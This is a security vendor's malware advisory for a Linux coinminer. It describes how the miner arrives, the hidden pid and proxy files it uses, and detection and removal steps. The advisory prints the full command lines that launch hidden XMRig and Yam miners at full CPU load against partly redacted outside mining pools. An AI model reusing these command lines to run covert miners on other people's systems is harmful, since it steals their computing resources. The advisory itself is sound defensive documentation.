COINMINER.LINUX.MALXMR.ATNF

 Analysis by: Johnlery Triunfante
 Modified by: John Anthony Banes

 PLATFORM:

Linux

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Coinminer

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet, Dropped by other malware

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It uses the system's central processing unit (CPU) and/or graphical processing unit (GPU) resources to mine cryptocurrency.

  TECHNICAL DETAILS

Payload:

Drops files

Arrival Details

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Coinminer drops the following files:

  • /tmp/.yam.pid - contains Process ID for Yam Miner
  • /tmp/.xmrig.pid - contains Process ID of XMRig Miner

Other Details

This Coinminer requires the existence of the following files to properly run:

  • {parameter1}/.yam - Yam Miner, or
  • {parameter1}/.xmrig - XMRig Miner

It does the following:

  • It accesses the following files for proxy configuration (only for Yam Miner):
    • /usr/bin/.proxy
    • /tmp/.proxy
    No proxies used if the files above are not present.
  • It executes the following commands to run XMRig miner:
    • {parameter2}/.xmrig --url={BLOCKED}.{BLOCKED}.146.35:4444/xmr --user={95 zeros}.{parameter1} -p x -k --url={BLOCKED}.{BLOCKED}.146.35:5555/xmr --user={95 zeros}.{parameter1} -p x -k --url={BLOCKED}.{BLOCKED}.146.35:3333/xmr --user={95 zeros}.{parameter1} -p x -k --url={BLOCKED}.{BLOCKED}.146.35:7777/xmr --user={95 zeros}.{parameter1} -p x -k --url={BLOCKED}.{BLOCKED}.146.35:80/xmr --user={95 zeros}.{parameter1} -p x -k --url={BLOCKED}.{BLOCKED}.146.35:443/xmr --user={95 zeros}.{parameter1} -p x -k --url={BLOCKED}.{BLOCKED}.146.35:6666/xmr --user={95 zeros}.{parameter1} -p x -k --max-cpu-usage=100 --donate-level=1 -B
  • It uses the following details for its coin mining routine:
    • Username: "{95 zeroes}.{parameter 1}"
    • Password: "x"
    • URLs:
      • {BLOCKED}.{BLOCKED}.146.35:80/xmr
      • {BLOCKED}.{BLOCKED}.146.35:443/xmr
      • {BLOCKED}.{BLOCKED}.146.35:3333/xmr
      • {BLOCKED}.{BLOCKED}.146.35:4444/xmr
      • {BLOCKED}.{BLOCKED}.146.35:5555/xmr
      • {BLOCKED}.{BLOCKED}.146.35:6666/xmr
      • {BLOCKED}.{BLOCKED}.146.35:7777/xmr
  • It executes the following commands to run Yam miner:
    • {parameter2}/.yam --cpu-load 100 -c x -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:4444/xmr -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:5555/xmr -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:3333/xmr -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:7777/xmr -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:80/xmr -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:443/xmr -M stratum+tcp://{95 zeros}.{parameter1}:x@{BLOCKED}.{BLOCKED}.146.35:6666/xmr {.proxy file contents, if present}

It uses the system's central processing unit (CPU) and/or graphical processing unit (GPU) resources to mine cryptocurrency. This behavior makes the system run abnormally slow.

  SOLUTION

Minimum Scan Engine:

9.850

FIRST VSAPI PATTERN FILE:

14.514.05

FIRST VSAPI PATTERN DATE:

19 Sep 2018

VSAPI OPR PATTERN File:

14.515.00

VSAPI OPR PATTERN Date:

20 Sep 2018

Scan your computer with your Trend Micro product to delete files detected as COINMINER.LINUX.MALXMR.ATNF. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.